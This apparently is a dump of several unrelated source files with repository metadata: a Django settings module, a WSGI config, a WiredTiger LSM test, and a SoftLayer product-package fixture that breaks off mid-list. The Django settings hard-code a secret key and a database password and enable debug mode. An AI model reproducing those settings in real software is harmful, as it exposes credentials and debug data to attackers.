import os BASE_DIR = os.path.dirname(os.path.dirname(__file__)) SECRET_KEY = '--v$_^*0r5(ok1^2sxdm4w_wwskvuv-z0tcop+yf1-m@+7p#5i' DEBUG = True TEMPLATE_DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'gunicorn', 'bootstrapform', 'yard', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'apply.urls' WSGI_APPLICATION = 'apply.wsgi.application' # Database # https://docs.djangoproject.com/en/1.6/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'. 'NAME': 'yard', # Or path to database file if using sqlite3. 'USER': 'frankie', # Not used with sqlite3. 'PASSWORD': 'frankie', # Not used with sqlite3. 'HOST': '', # Set to empty string for localhost. Not used with sqlite3. 'PORT': '', # Set to empty string for default. Not used with sqlite3. } } # Internationalization # https://docs.djangoproject.com/en/1.6/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.6/howto/static-files/ STATIC_URL = '/static/' DOCS_URL = BASE_DIR + '/yard/static/docs/' LOGGING = { 'version': 1, } LOGIN_REDIRECT_URL="/"
true
true
f705af023850008c9327aaee200ad9ea7dc63b24
405
py
Python
config/wsgi.py
bertini36/boatsandjoy-api
b22d82eb02947218d924b381160d622ded9e1d98
[ "MIT" ]
null
null
null
config/wsgi.py
bertini36/boatsandjoy-api
b22d82eb02947218d924b381160d622ded9e1d98
[ "MIT" ]
12
2021-04-08T21:18:37.000Z
2022-03-12T00:39:39.000Z
config/wsgi.py
bertini36/boatsandjoy-api
b22d82eb02947218d924b381160d622ded9e1d98
[ "MIT" ]
null
null
null
""" WSGI config for Boats & Joy project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/ """ import os from django.core.wsgi import get_wsgi_application os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.production') application = get_wsgi_application()
23.823529
78
0.782716
import os from django.core.wsgi import get_wsgi_application os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.production') application = get_wsgi_application()
true
true
f705b09b0a46fccb8f3405bc8e17fc8dd4cacc82
3,609
py
Python
src/third_party/wiredtiger/test/suite/test_lsm01.py
mwhudson/mongo
914bbbd26a686e032fdddec964b109ea78c6e6f6
[ "Apache-2.0" ]
14
2019-01-11T05:01:29.000Z
2021-11-01T00:39:46.000Z
src/third_party/wiredtiger/test/suite/test_lsm01.py
mwhudson/mongo
914bbbd26a686e032fdddec964b109ea78c6e6f6
[ "Apache-2.0" ]
1
2022-03-05T02:55:28.000Z
2022-03-05T05:28:00.000Z
src/third_party/wiredtiger/test/suite/test_lsm01.py
mwhudson/mongo
914bbbd26a686e032fdddec964b109ea78c6e6f6
[ "Apache-2.0" ]
7
2019-02-08T16:28:36.000Z
2021-05-08T14:25:47.000Z
#!/usr/bin/env python # # Public Domain 2014-2016 MongoDB, Inc. # Public Domain 2008-2014 WiredTiger, Inc. # # This is free and unencumbered software released into the public domain. # # Anyone is free to copy, modify, publish, use, compile, sell, or # distribute this software, either in source code form or as a compiled # binary, for any purpose, commercial or non-commercial, and by any # means. # # In jurisdictions that recognize copyright laws, the author or authors # of this software dedicate any and all copyright interest in the # software to the public domain. We make this dedication for the benefit # of the public at large and to the detriment of our heirs and # successors. We intend this dedication to be an overt act of # relinquishment in perpetuity of all present and future rights to this # software under copyright law. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR # OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, # ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR # OTHER DEALINGS IN THE SOFTWARE. import wiredtiger, wtscenario, wttest from wtdataset import SimpleDataSet # test_lsm01.py # Test LSM tree configuration options. class test_lsm01(wttest.WiredTigerTestCase): K = 1024 M = 1024 * K G = 1024 * M uri = "lsm:test_lsm01" chunk_size_scenarios = wtscenario.quick_scenarios('s_chunk_size', [1*M,20*M,None], [0.6,0.6,0.6]) merge_max_scenarios = wtscenario.quick_scenarios('s_merge_max', [2,10,20,None], None) bloom_scenarios = wtscenario.quick_scenarios('s_bloom', [True,False,None], None) bloom_bit_scenarios = wtscenario.quick_scenarios('s_bloom_bit_count', [2,8,20,None], None) bloom_hash_scenarios = wtscenario.quick_scenarios('s_bloom_hash_count', [2,10,20,None], None) # Occasionally add a lot of records, so that merges (and bloom) happen. record_count_scenarios = wtscenario.quick_scenarios( 'nrecs', [10, 10000], [0.9, 0.1]) config_vars = [ 'chunk_size', 'merge_max', 'bloom', 'bloom_bit_count', 'bloom_hash_count' ] scenarios = wtscenario.make_scenarios( chunk_size_scenarios, merge_max_scenarios, bloom_scenarios, bloom_bit_scenarios, bloom_hash_scenarios, record_count_scenarios, prune=100, prunelong=500) # Test drop of an object. def test_lsm(self): args = 'key_format=S' args += ',lsm=(' # Start the LSM configuration options. # add names to args, e.g. args += ',session_max=30' for var in self.config_vars: value = getattr(self, 's_' + var) if value != None: if var == 'verbose': value = '[' + str(value) + ']' if value == True: value = 'true' if value == False: value = 'false' args += ',' + var + '=' + str(value) args += ')' # Close the LSM configuration option group self.verbose(3, 'Test LSM with config: ' + args + ' count: ' + str(self.nrecs)) SimpleDataSet(self, self.uri, self.nrecs).populate() # TODO: Adding an explicit drop here can cause deadlocks, if a merge # is still happening. See issue #349. # self.session.drop(self.uri) if __name__ == '__main__': wttest.run()
41.011364
76
0.665281
import wiredtiger, wtscenario, wttest from wtdataset import SimpleDataSet class test_lsm01(wttest.WiredTigerTestCase): K = 1024 M = 1024 * K G = 1024 * M uri = "lsm:test_lsm01" chunk_size_scenarios = wtscenario.quick_scenarios('s_chunk_size', [1*M,20*M,None], [0.6,0.6,0.6]) merge_max_scenarios = wtscenario.quick_scenarios('s_merge_max', [2,10,20,None], None) bloom_scenarios = wtscenario.quick_scenarios('s_bloom', [True,False,None], None) bloom_bit_scenarios = wtscenario.quick_scenarios('s_bloom_bit_count', [2,8,20,None], None) bloom_hash_scenarios = wtscenario.quick_scenarios('s_bloom_hash_count', [2,10,20,None], None) record_count_scenarios = wtscenario.quick_scenarios( 'nrecs', [10, 10000], [0.9, 0.1]) config_vars = [ 'chunk_size', 'merge_max', 'bloom', 'bloom_bit_count', 'bloom_hash_count' ] scenarios = wtscenario.make_scenarios( chunk_size_scenarios, merge_max_scenarios, bloom_scenarios, bloom_bit_scenarios, bloom_hash_scenarios, record_count_scenarios, prune=100, prunelong=500) def test_lsm(self): args = 'key_format=S' args += ',lsm=(' for var in self.config_vars: value = getattr(self, 's_' + var) if value != None: if var == 'verbose': value = '[' + str(value) + ']' if value == True: value = 'true' if value == False: value = 'false' args += ',' + var + '=' + str(value) args += ')' self.verbose(3, 'Test LSM with config: ' + args + ' count: ' + str(self.nrecs)) SimpleDataSet(self, self.uri, self.nrecs).populate() if __name__ == '__main__': wttest.run()
true
true
f705b0edb87ae2c78f1229ba615f3eb737a2e382
68,829
py
Python
SoftLayer/fixtures/SoftLayer_Product_Package.py
kz6fittycent/softlayer-python
79a06c38bb48bb4d9712fec2d50ec26a7b2e2d72
[ "MIT" ]
null
null
null
SoftLayer/fixtures/SoftLayer_Product_Package.py
kz6fittycent/softlayer-python
79a06c38bb48bb4d9712fec2d50ec26a7b2e2d72
[ "MIT" ]
null
null
null
SoftLayer/fixtures/SoftLayer_Product_Package.py
kz6fittycent/softlayer-python
79a06c38bb48bb4d9712fec2d50ec26a7b2e2d72
[ "MIT" ]
null
null
null
# pylint: skip-file HARDWARE_ITEMS = [ {'attributes': [], 'capacity': '999', 'description': 'Unknown', 'itemCategory': {'categoryCode': 'unknown', 'id': 325}, 'keyName': 'UNKNOWN', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 1245172, "locationGroupId": '', 'itemId': 935954, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [], 'capacity': '64', 'description': '1 IPv6 Address', 'itemCategory': {'categoryCode': 'pri_ipv6_addresses', 'id': 325}, 'keyName': '1_IPV6_ADDRESS', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 17129, "locationGroupId": '', 'itemId': 4097, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [], 'capacity': '10', 'description': '10 Mbps Public & Private Network Uplinks', 'itemCategory': {'categoryCode': 'port_speed', 'id': 26}, 'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 272, "locationGroupId": '', 'itemId': 186, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 5}]}, {'attributes': [], 'capacity': '0', 'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)', 'itemCategory': {'categoryCode': 'os', 'id': 12}, 'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 37650, "locationGroupId": '', 'itemId': 4702, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 9}], 'softwareDescription': {'id': 1362, 'longDescription': 'Ubuntu / 14.04-64', 'referenceCode': 'UBUNTU_14_64'}}, {'attributes': [], 'capacity': '1', 'description': '1 IP Address', 'itemCategory': {'categoryCode': 'pri_ip_addresses', 'id': 13}, 'keyName': '1_IP_ADDRESS', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 21, "locationGroupId": '', 'itemId': 15, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [{'attributeTypeKeyName': 'RECLAIM_BYPASS', 'id': 1014}], 'description': 'Unlimited SSL VPN Users', 'itemCategory': {'categoryCode': 'vpn_management', 'id': 31}, 'keyName': 'SSL_VPN_USERS_1_PPTP_VPN_USER_PER_ACCOUNT', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 420, "locationGroupId": '', 'itemId': 309, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [], 'description': 'Reboot / KVM over IP', 'itemCategory': {'categoryCode': 'remote_management', 'id': 46}, 'keyName': 'REBOOT_KVM_OVER_IP', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 906, "locationGroupId": '', 'itemId': 504, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [], 'capacity': '0', 'description': '0 GB Bandwidth', 'itemCategory': {'categoryCode': 'bandwidth', 'id': 10}, 'keyName': 'BANDWIDTH_0_GB', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'id': 22505, "locationGroupId": '', 'itemId': 4481, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 98}]}, {'attributes': [], 'capacity': '0', 'description': '0 GB Bandwidth', 'itemCategory': {'categoryCode': 'bandwidth', 'id': 10}, 'keyName': 'BANDWIDTH_0_GB_2', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 1800, "locationGroupId": '', 'itemId': 439, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'setupFee': '0', 'sort': 99}]}] ENTERPRISE_PACKAGE = { 'categories': [ {'categoryCode': 'storage_service_enterprise'} ], 'id': 240, 'name': 'Endurance', 'items': [ { 'capacity': '0', 'itemCategory': {'categoryCode': 'storage_service_enterprise'}, 'keyName': 'CODENAME_PRIME_STORAGE_SERVICE', 'prices': [ { 'categories': [ {'categoryCode': 'storage_service_enterprise'} ], 'id': 45058, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': {'categoryCode': 'storage_file'}, 'keyName': 'FILE_STORAGE_2', 'prices': [ { 'categories': [ {'categoryCode': 'storage_file'} ], 'id': 45108, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': {'categoryCode': 'storage_block'}, 'keyName': 'BLOCK_STORAGE_2', 'prices': [ { 'categories': [ {'categoryCode': 'storage_block'} ], 'id': 45098, 'locationGroupId': '' } ] }, { 'capacity': '10', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '10_GB_STORAGE_SPACE', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 46160, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '300', 'capacityRestrictionMinimum': '300', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 46170, 'locationGroupId': '' } ] }, { 'capacity': '20', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 45860, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_replication'} ], 'id': 46659, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'id': 45128, 'locationGroupId': '' } ] }, { 'capacity': '1000', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE', 'prices': [ { 'capacityRestrictionMaximum': '300', 'capacityRestrictionMinimum': '300', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_replication'} ], 'id': 46789, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '300', 'capacityRestrictionMinimum': '300', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'id': 45318, 'locationGroupId': '' } ] }, { 'attributes': [ {'value': '300'} ], 'capacity': '300', 'itemCategory': {'categoryCode': 'storage_tier_level'}, 'keyName': 'WRITEHEAVY_TIER', 'prices': [ { 'categories': [ {'categoryCode': 'storage_tier_level'} ], 'id': 45088, 'locationGroupId': '' } ] }, { 'attributes': [ {'value': '200'} ], 'capacity': '200', 'itemCategory': {'categoryCode': 'storage_tier_level'}, 'keyName': 'READHEAVY_TIER', 'prices': [ { 'categories': [ {'categoryCode': 'storage_tier_level'} ], 'id': 45078, 'locationGroupId': '' } ] } ] } PERFORMANCE_PACKAGE = { 'categories': [ {'categoryCode': 'performance_storage_iscsi'}, {'categoryCode': 'performance_storage_nfs'} ], 'id': 222, 'name': 'Performance', 'items': [ { 'capacity': '0', 'itemCategory': {'categoryCode': 'performance_storage_iscsi'}, 'keyName': 'BLOCK_STORAGE_PERFORMANCE_ISCSI', 'prices': [ { 'categories': [ {'categoryCode': 'performance_storage_iscsi'} ], 'id': 40672, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': {'categoryCode': 'performance_storage_nfs'}, 'keyName': 'FILE_STORAGE_PERFORMANCE_NFS', 'prices': [ { 'categories': [ {'categoryCode': 'performance_storage_nfs'} ], 'id': 40662, 'locationGroupId': '' } ] }, { 'capacity': '20', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE', 'prices': [ { 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'id': 40682, 'locationGroupId': '' } ] }, { 'capacity': '1000', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE', 'prices': [ { 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'id': 40742, 'locationGroupId': '' } ] }, { 'capacity': '800', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'keyName': '800_IOPS_4', 'prices': [ { 'capacityRestrictionMaximum': '1000', 'capacityRestrictionMinimum': '100', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 41562, 'locationGroupId': '' } ] }, { 'capacity': '1000', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'keyName': '1000_IOPS', 'prices': [ { 'capacityRestrictionMaximum': '20', 'capacityRestrictionMinimum': '20', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 40882, 'locationGroupId': '' } ] } ] } SAAS_PACKAGE = { 'categories': [ {'categoryCode': 'storage_as_a_service'} ], 'id': 759, 'name': 'Storage As A Service (StaaS)', 'items': [ { 'capacity': '0', 'keyName': '', 'prices': [ { 'id': 189433, 'categories': [ {'categoryCode': 'storage_as_a_service'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'keyName': '', 'prices': [ { 'categories': [ {'categoryCode': 'storage_block'} ], 'id': 189443, 'locationGroupId': '' } ] }, { 'capacity': '0', 'keyName': '', 'prices': [ { 'categories': [ {'categoryCode': 'storage_file'} ], 'id': 189453, 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '999', 'capacityMinimum': '500', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '500_999_GBS', 'prices': [ { 'id': 189993, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '1999', 'capacityMinimum': '1000', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '1000_1999_GBS', 'prices': [ { 'id': 190113, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '12000', 'capacityMinimum': '1', 'keyName': 'STORAGE_SPACE_FOR_2_IOPS_PER_GB', 'prices': [ { 'id': 193433, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '12000', 'capacityMinimum': '1', 'keyName': 'STORAGE_SPACE_FOR_4_IOPS_PER_GB', 'prices': [ { 'id': 194763, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '10000', 'capacityMinimum': '100', 'keyName': '', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'prices': [ { 'capacityRestrictionMaximum': '999', 'capacityRestrictionMinimum': '500', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 190053, 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '20000', 'capacityMinimum': '100', 'keyName': '', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'prices': [ { 'capacityRestrictionMaximum': '1999', 'capacityRestrictionMinimum': '1000', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 190173, 'locationGroupId': '' } ] }, { 'capacity': '200', 'itemCategory': {'categoryCode': 'storage_tier_level'}, 'keyName': '', 'prices': [ { 'id': 193373, 'categories': [ {'categoryCode': 'storage_tier_level'} ], 'locationGroupId': '' } ] }, { 'capacity': '300', 'itemCategory': {'categoryCode': 'storage_tier_level'}, 'keyName': '', 'prices': [ { 'id': 194703, 'categories': [ {'categoryCode': 'storage_tier_level'} ], 'locationGroupId': '' } ] }, { 'capacity': '10', 'keyName': '', 'prices': [ { 'capacityRestrictionMaximum': '48000', 'capacityRestrictionMinimum': '100', 'capacityRestrictionType': 'IOPS', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 191193, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 193613, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '300', 'capacityRestrictionMinimum': '300', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 194943, 'locationGroupId': ''}] }, { 'capacity': '20', 'keyName': '', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 193853, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': { 'categoryCode': 'performance_storage_replication' }, 'keyName': 'REPLICATION_FOR_IOPSBASED_PERFORMANCE', 'prices': [ { 'capacityRestrictionMaximum': '48000', 'capacityRestrictionMinimum': '1', 'capacityRestrictionType': 'IOPS', 'categories': [ {'categoryCode': 'performance_storage_replication'} ], 'id': 192033, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': { 'categoryCode': 'performance_storage_replication' }, 'keyName': 'REPLICATION_FOR_TIERBASED_PERFORMANCE', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_replication'} ], 'id': 194693, 'locationGroupId': '' } ] } ] } SAAS_REST_PACKAGE = { 'categories': [ {'categoryCode': 'storage_as_a_service'} ], 'id': 759, 'name': 'Storage As A Service (StaaS)', 'items': [ { 'capacity': '0', 'keyName': '', 'prices': [ { 'id': 189433, 'categories': [ {'categoryCode': 'storage_as_a_service'} ], 'locationGroupId': None } ] }, { 'capacity': '20', 'keyName': '', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 193853, 'locationGroupId': None } ] }, { 'capacity': '0', 'capacityMaximum': '1999', 'capacityMinimum': '1000', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '1000_1999_GBS', 'prices': [ { 'id': 190113, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': None } ] }, { 'capacity': '0', 'capacityMaximum': '20000', 'capacityMinimum': '100', 'keyName': '', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'prices': [ { 'capacityRestrictionMaximum': '1999', 'capacityRestrictionMinimum': '1000', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 190173, 'locationGroupId': None } ] }, { 'capacity': '0', 'keyName': '', 'prices': [ { 'categories': [ {'categoryCode': 'storage_file'} ], 'id': 189453, 'locationGroupId': None } ] } ] } activePreset1 = { 'description': 'Single Xeon 1270, 8GB Ram, 2x1TB SATA disks, Non-RAID', 'id': 64, 'isActive': '1', 'keyName': 'S1270_8GB_2X1TBSATA_NORAID', 'name': 'S1270 8GB 2X1TBSATA NORAID', 'packageId': 200, 'prices': [ { "hourlyRecurringFee": "1.18", "id": 165711, "locationGroupId": '', "recurringFee": "780", } ] } activePreset2 = { 'description': 'Dual Xeon Gold, 384GB Ram, 4x960GB SSD, RAID 10', 'id': 65, 'isActive': '1', 'keyName': 'DGOLD_6140_384GB_4X960GB_SSD_SED_RAID_10', 'name': 'DGOLD 6140 384GB 4X960GB SSD SED RAID 10', 'packageId': 200, 'prices': [ { "hourlyRecurringFee": "1.18", "id": 165711, "locationGroupId": '', "recurringFee": "780", } ] } getAllObjects = [{ 'activePresets': [activePreset1], 'accountRestrictedActivePresets': [activePreset2], 'description': 'Bare Metal Server', 'firstOrderStepId': 1, 'id': 200, 'isActive': 1, 'items': HARDWARE_ITEMS, 'name': 'Bare Metal Server', 'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.', 'keyname': 'WASHINGTON_DC', 'location': {'location': {'id': 37473, 'longName': 'Washington 1', 'name': 'wdc01'}}, 'sortOrder': 10}], 'subDescription': 'Bare Metal Server', 'unitSize': 1, "itemPrices": [ { "hourlyRecurringFee": ".027", "id": 205911, "laborFee": "0", "locationGroupId": 505, "capacityRestrictionMaximum": "40", "capacityRestrictionMinimum": "40", "capacityRestrictionType": "CORE", "item": { "capacity": "0", "description": "Load Balancer Uptime", "id": 10785, "keyName": "LOAD_BALANCER_UPTIME", } }, { "hourlyRecurringFee": "0", "id": 199467, "laborFee": "0", "locationGroupId": '', "recurringFee": "0", "item": { "capacity": "0", "description": "Load Balancer Bandwidth", "id": 10051, "keyName": "LOAD_BALANCER_BANDWIDTH", } }, { "hourlyRecurringFee": ".028", "id": 205913, "laborFee": "0", "locationGroupId": 507, "item": { "capacity": "0", "description": "Load Balancer Uptime", "id": 10785, "keyName": "LOAD_BALANCER_UPTIME", } }] }] getItems = [ { 'id': 1234, 'keyName': 'KeyName01', 'capacity': '1000', 'description': 'Public & Private Networks', 'itemCategory': {'categoryCode': 'Uplink Port Speeds'}, 'softwareDescription': { 'id': 1228, 'longDescription': 'Redhat EL 5.10-64', 'referenceCode': 'REDHAT_5_64' }, 'prices': [{'id': 1122, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10, 'categories': [{'id': 26, 'name': 'Uplink Port Speeds', 'categoryCode': 'port_speed'}]}], }, { 'id': 2233, 'keyName': 'KeyName02', 'capacity': '1000', 'description': 'Public & Private Networks', 'itemCategory': {'categoryCode': 'Uplink Port Speeds'}, 'prices': [{'id': 4477, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10, 'categories': [{'id': 26, 'name': 'Uplink Port Speeds', 'categoryCode': 'port_speed'}]}], }, { 'id': 1239, 'keyName': 'KeyName03', 'capacity': '2', 'description': 'RAM', 'itemCategory': {'categoryCode': 'RAM'}, 'prices': [{'id': 1133, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 3, 'name': 'RAM', 'categoryCode': 'ram'}]}], }, { 'id': 1240, 'keyName': 'KeyName014', 'capacity': '4', 'units': 'PRIVATE_CORE', 'description': 'Computing Instance (Dedicated)', 'itemCategory': {'categoryCode': 'Computing Instance'}, 'prices': [{'id': 1007, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 80, 'name': 'Computing Instance', 'categoryCode': 'guest_core'}]}], }, { 'id': 1250, 'keyName': 'KeyName015', 'capacity': '4', 'units': 'CORE', 'description': 'Computing Instance', 'itemCategory': {'categoryCode': 'Computing Instance'}, 'prices': [{'id': 1144, 'locationGroupId': None, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10, 'categories': [{'id': 80, 'name': 'Computing Instance', 'categoryCode': 'guest_core'}]}], }, { 'id': 112233, 'keyName': 'KeyName016', 'capacity': '55', 'units': 'CORE', 'description': 'Computing Instance', 'itemCategory': {'categoryCode': 'Computing Instance'}, 'prices': [{'id': 332211, 'locationGroupId': 1, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 80, 'name': 'Computing Instance', 'categoryCode': 'guest_core'}]}], }, { 'id': 4439, 'keyName': 'KeyName017', 'capacity': '1', 'description': '1 GB iSCSI Storage', 'itemCategory': {'categoryCode': 'iscsi'}, 'prices': [{'id': 2222, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, { 'id': 1121, 'keyName': 'KeyName081', 'capacity': '20', 'description': '20 GB iSCSI snapshot', 'itemCategory': {'categoryCode': 'iscsi_snapshot_space'}, 'prices': [{'id': 2014, 'hourlyRecurringFee': 0.10}], }, { 'id': 4440, 'keyName': 'KeyName019', 'capacity': '4', 'description': '4 Portable Public IP Addresses', 'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'}, 'prices': [{'id': 4444, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, { 'id': 8880, 'keyName': 'KeyName0199', 'capacity': '8', 'description': '8 Portable Public IP Addresses', 